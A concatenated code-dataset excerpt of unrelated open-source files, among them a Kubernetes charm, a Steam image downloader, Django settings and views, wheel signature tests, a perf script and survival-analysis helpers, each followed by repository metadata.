# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
def get_dns_ip():
'''Get an IP address for the DNS server on the provided cidr.'''
interface = ipaddress.IPv4Interface(service_cidr())
# Add .10 at the end of the network
ip = interface.network.network_address + 10
return ip.exploded
def get_kubernetes_service_ip():
'''Get the IP address for the kubernetes service based on the cidr.'''
interface = ipaddress.IPv4Interface(service_cidr())
# Add .1 at the end of the network
ip = interface.network.network_address + 1
return ip.exploded
def handle_etcd_relation(reldata):
''' Save the client credentials and set appropriate daemon flags when
etcd declares itself as available'''
connection_string = reldata.get_connection_string()
# Define where the etcd tls files will be kept.
etcd_dir = '/root/cdk/etcd'
# Create paths to the etcd client ca, key, and cert file locations.
ca = os.path.join(etcd_dir, 'client-ca.pem')
key = os.path.join(etcd_dir, 'client-key.pem')
cert = os.path.join(etcd_dir, 'client-cert.pem')
# Save the client credentials (in relation data) to the paths provided.
reldata.save_client_credentials(key, cert, ca)
api_opts = FlagManager('kube-apiserver')
# Never use stale data, always prefer whats coming in during context
# building. if its stale, its because whats in unitdata is stale
data = api_opts.data
if data.get('etcd-servers-strict') or data.get('etcd-servers'):
api_opts.destroy('etcd-cafile')
api_opts.destroy('etcd-keyfile')
api_opts.destroy('etcd-certfile')
api_opts.destroy('etcd-servers', strict=True)
api_opts.destroy('etcd-servers')
# Set the apiserver flags in the options manager
api_opts.add('etcd-cafile', ca)
api_opts.add('etcd-keyfile', key)
api_opts.add('etcd-certfile', cert)
api_opts.add('etcd-servers', connection_string, strict=True)
def configure_master_services():
''' Add remaining flags for the master services and configure snaps to use
them '''
api_opts = FlagManager('kube-apiserver')
controller_opts = FlagManager('kube-controller-manager')
scheduler_opts = FlagManager('kube-scheduler')
scheduler_opts.add('v', '2')
# Get the tls paths from the layer data.
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
client_cert_path = layer_options.get('client_certificate_path')
client_key_path = layer_options.get('client_key_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
if is_privileged():
api_opts.add('allow-privileged', 'true', strict=True)
set_state('kubernetes-master.privileged')
else:
api_opts.add('allow-privileged', 'false', strict=True)
remove_state('kubernetes-master.privileged')
# Handle static options for now
api_opts.add('service-cluster-ip-range', service_cidr())
api_opts.add('min-request-timeout', '300')
api_opts.add('v', '4')
api_opts.add('tls-cert-file', server_cert_path)
api_opts.add('tls-private-key-file', server_key_path)
api_opts.add('kubelet-certificate-authority', ca_cert_path)
api_opts.add('kubelet-client-certificate', client_cert_path)
api_opts.add('kubelet-client-key', client_key_path)
api_opts.add('logtostderr', 'true')
api_opts.add('insecure-bind-address', '127.0.0.1')
api_opts.add('insecure-port', '8080')
api_opts.add('storage-backend', 'etcd2') # FIXME: add etcd3 support
admission_control = [
'Initializers',
'NamespaceLifecycle',
'LimitRanger',
'ServiceAccount',
'ResourceQuota',
'DefaultTolerationSeconds'
]
if get_version('kube-apiserver') < (1, 6):
hookenv.log('Removing DefaultTolerationSeconds from admission-control')
admission_control.remove('DefaultTolerationSeconds')
if get_version('kube-apiserver') < (1, 7):
hookenv.log('Removing Initializers from admission-control')
admission_control.remove('Initializers')
api_opts.add('admission-control', ','.join(admission_control), strict=True)
# Default to 3 minute resync. TODO: Make this configureable?
controller_opts.add('min-resync-period', '3m')
controller_opts.add('v', '2')
controller_opts.add('root-ca-file', ca_cert_path)
controller_opts.add('logtostderr', 'true')
controller_opts.add('master', 'http://127.0.0.1:8080')
scheduler_opts.add('v', '2')
scheduler_opts.add('logtostderr', 'true')
scheduler_opts.add('master', 'http://127.0.0.1:8080')
cmd = ['snap', 'set', 'kube-apiserver'] + api_opts.to_s().split(' ')
check_call(cmd)
cmd = (
['snap', 'set', 'kube-controller-manager'] +
controller_opts.to_s().split(' ')
)
check_call(cmd)
cmd = ['snap', 'set', 'kube-scheduler'] + scheduler_opts.to_s().split(' ')
check_call(cmd)
def setup_basic_auth(password=None, username='admin', uid='admin'):
'''Create the htacces file and the tokens.'''
root_cdk = '/root/cdk'
if not os.path.isdir(root_cdk):
os.makedirs(root_cdk)
htaccess = os.path.join(root_cdk, 'basic_auth.csv')
if not password:
password = token_generator()
with open(htaccess, 'w') as stream:
stream.write('{0},{1},{2}'.format(password, username, uid))
def setup_tokens(token, username, user):
'''Create a token file for kubernetes authentication.'''
root_cdk = '/root/cdk'
if not os.path.isdir(root_cdk):
os.makedirs(root_cdk)
known_tokens = os.path.join(root_cdk, 'known_tokens.csv')
if not token:
token = token_generator()
with open(known_tokens, 'a') as stream:
stream.write('{0},{1},{2}\n'.format(token, username, user))
def get_password(csv_fname, user):
'''Get the password of user within the csv file provided.'''
root_cdk = '/root/cdk'
tokens_fname = os.path.join(root_cdk, csv_fname)
if not os.path.isfile(tokens_fname):
return None
with open(tokens_fname, 'r') as stream:
for line in stream:
record = line.split(',')
if record[1] == user:
return record[0]
return None
def get_token(username):
"""Grab a token from the static file if present. """
return get_password('known_tokens.csv', username)
def set_token(password, save_salt):
''' Store a token so it can be recalled later by token_generator.
param: password - the password to be stored
param: save_salt - the key to store the value of the token.'''
db = unitdata.kv()
db.set(save_salt, password)
return db.get(save_salt)
def token_generator(length=32):
''' Generate a random token for use in passwords and account tokens.
param: length - the length of the token to generate'''
alpha = string.ascii_letters + string.digits
token = ''.join(random.SystemRandom().choice(alpha) for _ in range(length))
return token
@retry(times=3, delay_secs=10)
def all_kube_system_pods_running():
''' Check pod status in the kube-system namespace. Returns True if all
pods are running, False otherwise. '''
cmd = ['kubectl', 'get', 'po', '-n', 'kube-system', '-o', 'json']
try:
output = check_output(cmd).decode('utf-8')
except CalledProcessError:
hookenv.log('failed to get kube-system pod status')
return False
result = json.loads(output)
for pod in result['items']:
status = pod['status']['phase']
if status != 'Running':
return False
return True
def apiserverVersion():
cmd = 'kube-apiserver --version'.split()
version_string = check_output(cmd).decode('utf-8')
return tuple(int(q) for q in re.findall("[0-9]+", version_string)[:3])
| apache-2.0 | 7,844,764,014,608,322,000 | 35.915507 | 79 | 0.667286 | false |
Codeusa/Steam-Grid-View-Image-Dumper | griddumper.py | 1 | 1594 | import sys
import os.path
from urllib2 import urlopen, HTTPError
import time
import re
def get_app_ids(appstring):
index = '"appid":'
substring = 0
while True:
substring = appstring.find(index, substring)
if substring == -1:
return
pattern = re.compile('(\"appid":)([0-9]+)')
match = pattern.match(appstring, substring)
resolve = int(match.group(2))
substring += len(match.group())
yield resolve
username = raw_input("Enter your steam profile username: ")
profileURL = "http://steamcommunity.com/id/" + username + "/games?tab=all"
stream = urlopen(profileURL)
if stream is None:
print("Stream produced nothing or did not load, failing obviously")
sys.exit()
try:
os.mkdir("griddump")
except OSError:
pass
app_ids = []
for line in stream:
line = str(line)
for appid in get_app_ids(line):
app_ids.append(appid)
for appid in app_ids:
path = "griddump/" + str(appid) + ".png"
'''
#_by using header.png you can grab other versions of the grid.
#For example Modern Warfare produced a multiplayer grid icon.
'''
profileURL = "http://cdn.steampowered.com/v/gfx/apps/" + str(appid) + "/header.jpg"
if os.path.exists(path):
print("Already saved this one, moving on. AppID: " + str(appid))
continue
try:
stream = urlopen(profileURL)
except HTTPError:
print("Can't stream URL " + str(appid))
continue
f = open(path, 'wb')
f.write(stream.read())
print("Downloading Grid for AppID: " + str(appid))
| gpl-3.0 | -4,743,272,856,986,844,000 | 25.566667 | 87 | 0.624216 | false |
jyi/ITSP | prophet-gpl/crawler/python-github3-master/setup.py | 6 | 1203 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from os.path import join
from setuptools import setup, find_packages
import pygithub3
# Odd hack to get 'python setup.py test' working on py2.7
try:
import multiprocessing
import logging
except ImportError:
pass
setup(
name=pygithub3.__name__,
version=pygithub3.__version__,
author=pygithub3.__author__,
author_email=pygithub3.__email__,
url='https://github.com/copitux/python-github3',
description='Python wrapper for the github v3 api',
long_description=open('README.rst').read(),
license='ISC',
packages=find_packages(exclude=['*tests*']),
test_suite='nose.collector',
tests_require=[
'nose',
'mock',
],
install_requires=map(str.strip, open(join('requirements', 'base.txt'))),
include_package_data=True,
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: OS Independent',
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
),
)
| mit | 316,954,749,045,166,800 | 27.642857 | 76 | 0.632585 | false |
carsongee/edx-platform | common/djangoapps/config_models/__init__.py | 220 | 2002 | """
Model-Based Configuration
=========================
This app allows other apps to easily define a configuration model
that can be hooked into the admin site to allow configuration management
with auditing.
Installation
------------
Add ``config_models`` to your ``INSTALLED_APPS`` list.
Usage
-----
Create a subclass of ``ConfigurationModel``, with fields for each
value that needs to be configured::
class MyConfiguration(ConfigurationModel):
frobble_timeout = IntField(default=10)
frazzle_target = TextField(defalut="debug")
This is a normal django model, so it must be synced and migrated as usual.
The default values for the fields in the ``ConfigurationModel`` will be
used if no configuration has yet been created.
Register that class with the Admin site, using the ``ConfigurationAdminModel``::
from django.contrib import admin
from config_models.admin import ConfigurationModelAdmin
admin.site.register(MyConfiguration, ConfigurationModelAdmin)
Use the configuration in your code::
def my_view(self, request):
config = MyConfiguration.current()
fire_the_missiles(config.frazzle_target, timeout=config.frobble_timeout)
Use the admin site to add new configuration entries. The most recently created
entry is considered to be ``current``.
Configuration
-------------
The current ``ConfigurationModel`` will be cached in the ``configuration`` django cache,
or in the ``default`` cache if ``configuration`` doesn't exist. You can specify the cache
timeout in each ``ConfigurationModel`` by setting the ``cache_timeout`` property.
You can change the name of the cache key used by the ``ConfigurationModel`` by overriding
the ``cache_key_name`` function.
Extension
---------
``ConfigurationModels`` are just django models, so they can be extended with new fields
and migrated as usual. Newly added fields must have default values and should be nullable,
so that rollbacks to old versions of configuration work correctly.
"""
| agpl-3.0 | -7,320,066,905,892,144,000 | 31.290323 | 90 | 0.741259 | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/wheel/test/test_signatures.py | 565 | 1120 | from wheel import signatures
from wheel.signatures import djbec, ed25519py
from wheel.util import binary
def test_getlib():
signatures.get_ed25519ll()
def test_djbec():
djbec.dsa_test()
djbec.dh_test()
def test_ed25519py():
kp0 = ed25519py.crypto_sign_keypair(binary(' '*32))
kp = ed25519py.crypto_sign_keypair()
signed = ed25519py.crypto_sign(binary('test'), kp.sk)
ed25519py.crypto_sign_open(signed, kp.vk)
try:
ed25519py.crypto_sign_open(signed, kp0.vk)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign_keypair(binary(' '*33))
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign(binary(''), binary(' ')*31)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign_open(binary(''), binary(' ')*31)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
| mit | 355,611,683,186,622,800 | 22.851064 | 62 | 0.6125 | false |
JoeGlancy/linux | tools/perf/scripts/python/futex-contention.py | 1997 | 1508 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 | -9,223,116,981,966,895,000 | 29.16 | 96 | 0.690318 | false |
VishvajitP/django-tastypie | tests/namespaced/tests.py | 11 | 1284 | from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import HttpRequest
from django.test import TestCase
from django.utils import simplejson as json
class NamespacedViewsTestCase(TestCase):
urls = 'namespaced.api.urls'
def test_urls(self):
from namespaced.api.urls import api
patterns = api.urls
self.assertEqual(len(patterns), 3)
self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, 'name')]), ['api_v1_top_level'])
self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, 'name')] for include in patterns if hasattr(include, 'reverse_dict')], [['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail'], ['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail']])
self.assertRaises(NoReverseMatch, reverse, 'api_v1_top_level')
self.assertRaises(NoReverseMatch, reverse, 'special:api_v1_top_level')
self.assertEquals(reverse('special:api_v1_top_level', kwargs={'api_name': 'v1'}), '/api/v1/')
self.assertEquals(reverse('special:api_dispatch_list', kwargs={'api_name': 'v1', 'resource_name': 'notes'}), '/api/v1/notes/')
| bsd-3-clause | -4,008,991,076,824,836,000 | 60.142857 | 336 | 0.702492 | false |
ric2b/Vivaldi-browser | chromium/chrome/common/extensions/docs/examples/apps/hello-python/oauth2/clients/smtp.py | 884 | 1680 | """
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import oauth2
import smtplib
import base64
class SMTP(smtplib.SMTP):
"""SMTP wrapper for smtplib.SMTP that implements XOAUTH."""
def authenticate(self, url, consumer, token):
if consumer is not None and not isinstance(consumer, oauth2.Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, oauth2.Token):
raise ValueError("Invalid token.")
self.docmd('AUTH', 'XOAUTH %s' % \
base64.b64encode(oauth2.build_xoauth_string(url, consumer, token)))
| bsd-3-clause | -8,429,839,645,670,632,000 | 39.97561 | 79 | 0.754762 | false |
edushifts/book-voyage | bookvoyage-backend/core/mail/__init__.py | 1 | 3852 | """
Tools for sending email.
"""
# Import utilities
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import send_mail
from django.utils.http import urlsafe_base64_encode
# Import environment variables
from bookvoyage.settings import HOST_FRONTEND, PASSWORD_RESET_LINK, DEFAULT_FROM_EMAIL, JOURNEY_LINK
# Define logger
import logging
logger = logging.getLogger('MailUtil')
def send_owner_invitation(user):
"""
Sends user an invitation e-mail that includes a password reset link.
Adapted from https://github.com/pennersr/django-allauth/blob/master/allauth/account/forms.py
"""
user_email = user.email
# Generate password reset token
token_generator = default_token_generator
temp_key = token_generator.make_token(user)
url = HOST_FRONTEND + PASSWORD_RESET_LINK\
+ force_text(urlsafe_base64_encode((force_bytes(user.id)))) + "-" + temp_key
msg_plain = render_to_string('owner_invitation.txt', {'platformUrl': url})
msg_html = render_to_string('owner_invitation.html', {'platformUrl': url})
send_mail(
'Welcome to EDUshifts Book Voyage!',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Owner Invitation sent to: " + user_email)
def send_password_reset(user):
"""
Sends user an invitation e-mail that includes a password reset link.
Adapted from https://github.com/pennersr/django-allauth/blob/master/allauth/account/forms.py
"""
user_email = user.email
# Generate password reset token
token_generator = default_token_generator
temp_key = token_generator.make_token(user)
url = HOST_FRONTEND + PASSWORD_RESET_LINK\
+ force_text(urlsafe_base64_encode((force_bytes(user.id)))) + "-" + temp_key
msg_plain = render_to_string('password-reset.txt', {'platformUrl': url})
msg_html = render_to_string('password_reset.html', {'platformUrl': url})
send_mail(
'EDUshifts Book Voyage password reset',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Password reset sent to: " + user_email)
def send_holder_welcome(user, book):
"""
Sends holder a thank-you e-mail for having registered a book, and send them a link to the public journey.
"""
user_email = user.email
book_id = book.id
url = HOST_FRONTEND + JOURNEY_LINK + str(book_id)
msg_plain = render_to_string('holder_welcome.txt', {'platformUrl': url})
msg_html = render_to_string('holder_welcome.html', {'platformUrl': url})
send_mail(
'Welcome to EDUshifts Book Voyage!',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Holder welcome sent to: " + user_email)
def send_book_update_mass(users, book):
"""
Performs send_book_update() for multiple users.
TODO: implement send_mass_mail()
"""
for user in users:
send_book_update(user, book)
logger.info("Book updates were sent")
def send_book_update(user, book):
"""
Sends single holder an update on the latest book location, and send them a link to the public journey.
"""
user_email = user.email
user_name = user.first_name
book_id = book.id
url = HOST_FRONTEND + JOURNEY_LINK + str(book_id)
msg_plain = render_to_string('book_update.txt', {'platformUrl': url, 'username': user_name})
msg_html = render_to_string('book_update.html', {'platformUrl': url, 'username': user_name})
send_mail(
'Book Voyage Update',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
| gpl-3.0 | -5,521,015,942,578,284,000 | 30.064516 | 109 | 0.66433 | false |
spacecowboy/article-annriskgroups-source | stats.py | 1 | 3897 | # -*- coding: utf-8 -*-
import numpy as np
def surv_area(durations, events=None, absolute=False):
'''
Parameters:
durations - array of event times (must be greater than zero)
events - array of event indicators (1/True for event, 0/False for censored)
absolute - if True, returns the actual area. Otherwise, a relative value
between 0 and 1
Returns:
area - The area under the survival curve
'''
if events is None:
events = np.ones_like(durations, dtype=bool)
events = events.astype(bool)
# Unique event times
TU = np.sort(np.unique(durations[events]))
# Starting values
S = 1.0
A = 0.0
p = 0
for t in TU:
# Add box to area
A += S * (t - p)
# People at risk
R = np.sum(durations >= t)
# Deaths between previous and now
deaths = np.sum(durations[events] == t)
# Update survival
S *= (R - deaths) / R
p = t
# If we have censored beyond last event
A += S * (np.max(durations) - p)
if not absolute:
A /= np.max(durations)
return A
def k_fold_cross_validation(fitters, df, duration_col, event_col=None,
k=5, evaluation_measure=None, predictor="predict_median",
predictor_kwargs={}):
"""
Perform cross validation on a dataset.
fitter: A list of fitters. They will all train on the same subsets.
df: a Pandas dataframe with necessary columns `duration_col` and `event_col`, plus
other covariates. `duration_col` refers to the lifetimes of the subjects. `event_col`
refers to whether the 'death' events was observed: 1 if observed, 0 else (censored).
duration_col: the column in dataframe that contains the subjects lifetimes.
event_col: the column in dataframe that contains the subject's death observation. If left
as None, assumes all individuals are non-censored.
k: the number of folds to perform. n/k data will be withheld for testing on.
evaluation_measure: a function that accepts either (event_times, predicted_event_times),
or (event_times, predicted_event_times, event_observed) and returns a scalar value.
Default: statistics.concordance_index: (C-index) between two series of event times
predictor: a string that matches a prediction method on the fitter instances. For example,
"predict_expectation" or "predict_percentile". Default is "predict_median"
predictor_kwargs: keyward args to pass into predictor.
Returns:
k-length list of scores for each fold.
"""
n, d = df.shape
# Each fitter has its own scores
fitterscores = [[] for _ in fitters]
if event_col is None:
event_col = 'E'
df[event_col] = 1.
# reindex returns a copy
df = df.reindex(np.random.permutation(df.index))
df.sort(event_col, inplace=True)
assignments = np.array((n // k + 1) * list(range(1, k + 1)))
assignments = assignments[:n]
testing_columns = df.columns - [duration_col, event_col]
for i in range(1, k + 1):
ix = assignments == i
training_data = df.ix[~ix]
testing_data = df.ix[ix]
T_actual = testing_data[duration_col].values
E_actual = testing_data[event_col].values
X_testing = testing_data[testing_columns]
for fitter, scores in zip(fitters, fitterscores):
# fit the fitter to the training data
fitter.fit(training_data, duration_col=duration_col, event_col=event_col)
T_pred = getattr(fitter, predictor)(X_testing, **predictor_kwargs).values
try:
scores.append(evaluation_measure(T_actual, T_pred, E_actual))
except TypeError:
scores.append(evaluation_measure(T_actual, T_pred))
return fitterscores
| gpl-3.0 | -7,565,069,649,911,503,000 | 35.083333 | 101 | 0.625353 | false |
trungnt13/scikit-learn | examples/linear_model/plot_ols.py | 220 | 1940 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Linear Regression Example
=========================================================
This example uses the only the first feature of the `diabetes` dataset, in
order to illustrate a two-dimensional plot of this regression technique. The
straight line can be seen in the plot, showing how linear regression attempts
to draw a straight line that will best minimize the residual sum of squares
between the observed responses in the dataset, and the responses predicted by
the linear approximation.
The coefficients, the residual sum of squares and the variance score are also
calculated.
"""
print(__doc__)
# Code source: Jaques Grobler
# License: BSD 3 clause
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets, linear_model
# Load the diabetes dataset
diabetes = datasets.load_diabetes()
# Use only one feature
diabetes_X = diabetes.data[:, np.newaxis, 2]
# Split the data into training/testing sets
diabetes_X_train = diabetes_X[:-20]
diabetes_X_test = diabetes_X[-20:]
# Split the targets into training/testing sets
diabetes_y_train = diabetes.target[:-20]
diabetes_y_test = diabetes.target[-20:]
# Create linear regression object
regr = linear_model.LinearRegression()
# Train the model using the training sets
regr.fit(diabetes_X_train, diabetes_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(diabetes_X_test) - diabetes_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % regr.score(diabetes_X_test, diabetes_y_test))
# Plot outputs
plt.scatter(diabetes_X_test, diabetes_y_test, color='black')
plt.plot(diabetes_X_test, regr.predict(diabetes_X_test), color='blue',
linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
| bsd-3-clause | 1,261,405,634,912,694,300 | 27.955224 | 77 | 0.700515 | false |
trianglefraternitymtu/slack-bridge | server/settings.py | 1 | 4877 | """
Django settings for slack announcement approval project, on Heroku. For more info, see:
https://github.com/heroku/heroku-django-template
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = "DEBUG_MODE" in os.environ
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'channels',
'website'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'debug': True,
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# Update database configuration with $DATABASE_URL.
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Channel settings
CHANNEL_LAYERS = {
"default": {
"BACKEND": "asgi_redis.RedisChannelLayer",
"CONFIG": {
"hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
},
"ROUTING": "server.routing.channel_routing",
},
}
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': ('%(asctime)s [%(process)d] [%(levelname)s] ' +
'pathname=%(pathname)s lineno=%(lineno)s ' +
'funcname=%(funcName)s %(message)s'),
'datefmt': '%Y-%m-%d %H:%M:%S'
},
'simple': {
'format': '%(levelname)s %(message)s'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'basicLogger': {
'handlers': ['console'],
'level': 'DEBUG',
}
}
}
| mit | -9,003,396,248,352,767,000 | 27.354651 | 91 | 0.635022 | false |
mdanielwork/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/db/backends/util.py | 377 | 1749 | """
A collection of utility routines and classes used by the spatial
backends.
"""
def gqn(val):
"""
The geographic quote name function; used for quoting tables and
geometries (they use single rather than the double quotes of the
backend quotename function).
"""
if isinstance(val, basestring):
if isinstance(val, unicode): val = val.encode('ascii')
return "'%s'" % val
else:
return str(val)
class SpatialOperation(object):
"""
Base class for generating spatial SQL.
"""
sql_template = '%(geo_col)s %(operator)s %(geometry)s'
def __init__(self, function='', operator='', result='', **kwargs):
self.function = function
self.operator = operator
self.result = result
self.extra = kwargs
def as_sql(self, geo_col, geometry='%s'):
return self.sql_template % self.params(geo_col, geometry)
def params(self, geo_col, geometry):
params = {'function' : self.function,
'geo_col' : geo_col,
'geometry' : geometry,
'operator' : self.operator,
'result' : self.result,
}
params.update(self.extra)
return params
class SpatialFunction(SpatialOperation):
"""
Base class for generating spatial SQL related to a function.
"""
sql_template = '%(function)s(%(geo_col)s, %(geometry)s)'
def __init__(self, func, result='', operator='', **kwargs):
# Getting the function prefix.
default = {'function' : func,
'operator' : operator,
'result' : result
}
kwargs.update(default)
super(SpatialFunction, self).__init__(**kwargs)
| apache-2.0 | -7,309,029,701,186,243,000 | 30.232143 | 70 | 0.571184 | false |
vongochung/buiquocviet | home/views.py | 1 | 11342 | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.http import Http404
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, redirect, HttpResponse, get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.contrib.auth.decorators import login_required
from home.models import POST, Category, IMAGE_STORE
from datetime import datetime
from django.core.paginator import Paginator, PageNotAnInteger
from google.appengine.api import memcache
import json
from django.views.decorators.cache import cache_page
from django.db.models import Q
from home.function import MultiCookie
from google.appengine.ext import blobstore
from google.appengine.api import images
import cgi
now = datetime.now()
from settings import PAGE_SIZE
#@cache_page(60 * 5)
def index(request):
lang = request.LANGUAGE_CODE
